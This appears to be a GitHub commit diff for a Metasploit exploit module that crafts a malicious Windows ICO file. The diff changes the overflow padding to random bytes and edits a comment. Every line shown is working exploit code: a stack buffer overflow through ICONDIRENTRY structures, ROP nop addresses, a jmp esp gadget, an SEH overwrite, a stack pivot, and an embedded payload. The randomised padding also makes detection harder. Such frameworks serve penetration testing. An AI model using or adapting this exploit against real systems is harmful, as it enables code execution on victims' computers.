File tree Expand file tree Collapse file tree 1 file changed +5
-5
lines changed
modules/exploits/windows/fileformat Expand file tree Collapse file tree 1 file changed +5
-5
lines changed Original file line number Diff line number Diff line change @@ -72,25 +72,25 @@ def target_win7
7272 # ICONDIRENTRY structures 102 structures are using to overwrite
7373 # every structure = 16 bytes
7474 # 100 structures are used to reach the local variables
75- ico << "A" * 652
75+ ico << rand_text ( 652 )
7676 ico << [ 0x0044729d ] . pack ( "V" ) * 20 # ret # rop nops are used to allow code execution with the different opening methods
7777 ico << [ 0x0045cc21 ] . pack ( "V" ) # jmp esp
7878 ico << payload . encoded
79- ico << "B" * (
79+ ico << rand_text (
8080 1600 - # 1600 = 16 ICONDIRENTRY struct size * 100
81- 652 - # padding
81+ 652 - # padding to align the stack pivot
8282 80 - # rop nops size
8383 4 - # jmp esp pointer size
8484 payload . encoded . length
8585 )
8686 # The next ICONDIRENTRY allows to overwrite the interesting local variables
8787 # on the stack
8888 ico << [ 2 ] . pack ( "V" ) # Counter (remaining bytes) saved on the stack
89- ico << "A" * 8 # Padding
89+ ico << rand_text ( 8 ) # Padding
9090 ico << [ 0xfffffffe ] . pack ( "V" ) # Index to the dst buffer saved on the stack, allows to point to the SEH handler
9191 # The next ICONDIRENTRY allows to overwrite the seh handler
9292 ico << [ 0x00447296 ] . pack ( "V" ) # Stackpivot: add esp, 0x800 # pop ebx # ret
93- ico << "B" * ( 0xc ) # padding
93+ ico << rand_text ( 0xc ) # padding
9494 return ico
9595 end
9696
You can’t perform that action at this time.
0 commit comments